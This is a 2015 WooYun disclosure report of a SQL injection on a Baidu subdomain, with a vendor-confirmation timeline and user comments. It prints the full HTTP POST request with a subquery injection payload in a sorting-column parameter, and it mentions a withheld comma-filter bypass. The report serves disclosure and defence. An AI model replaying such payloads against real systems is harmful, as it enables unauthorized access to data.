百度某子站SQL注入

编号104032
Urlhttp://www.wooyun.org/bug.php?action=view&id=104032
漏洞状态厂商已经确认
漏洞标题百度某子站SQL注入
漏洞类型SQL注射漏洞
厂商百度
白帽子Jannock
提交日期2015-03-26 21:51:00
公开日期2015-05-11 12:02:00
修复时间(not set)
确认时间2015-03-27 00:00:00
Confirm Spend1
漏洞标签注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank10
漏洞简介
百度某子站SQL注入
漏洞细节

POST /statistics/detail HTTP/1.1
Host: baitong.baidu.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://baitong.baidu.com/statistics/index
Content-Length: 351
Cookie: cookie
Pragma: no-cache
Cache-Control: no-cache
Connection: Keep-Alive
sEcho=3&iColumns=3&sColumns=app_name%2Cdownload_num%2C(1-(case when(1=2) then 1 else (select 1 union select 2) end))&iDisplayStart=0&iDisplayLength=10&mDataProp_0=app_name&mDataProp_1=download_num&mDataProp_2=money_num&iSortingCols=1&iSortCol_0=2&sSortDir_0=desc&bSortable_0=false&bSortable_1=true&bSortable_2=true&id=0&begin=2015-03-19&end=2015-03-25


注入点不能用 , 号,绕过方式就不说了。可以获取所有数据。

POC

1.png


2.png


3.png


database() baitong

修复方案

过滤

状态信息 2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-04-06: 细节向核心白帽子及相关领域专家公开
2015-04-16: 细节向普通白帽子公开
2015-04-26: 细节向实习白帽子公开
2015-05-11: 细节向公众公开
厂商回复感谢提交,已通知业务部门处理
回应信息危害等级:中漏洞Rank:10 确认时间:2015-03-27 12:01
Showing 1-11 of 11 items.
评论内容评论人点赞数评论时间

百度带套了吗

Arrow02015-03-29 10:20:00

你关注的白帽子 Jannock 发表了漏洞 百度某子站SQL注入。

天鱼02015-03-28 12:21:00

你关注的白帽子 Jannock 发表了漏洞 百度某子站SQL注入。

an0nym0u502015-03-27 20:08:00

一哥来打卡了么。。

sco4x002015-03-27 09:51:00

斯..斯国一

大亮02015-03-27 09:38:00

将安全进行到底

明月影02015-03-27 07:51:00

百度今年流年不利啊

Taro02015-03-26 23:27:00

暴虐BAT!

90Snake02015-03-26 22:18:00

暴虐BAT!

qhwlpg02015-03-26 22:11:00

前排卖辣条!!

Evan02015-03-26 22:09:00

沙发

answer02015-03-26 21:53:00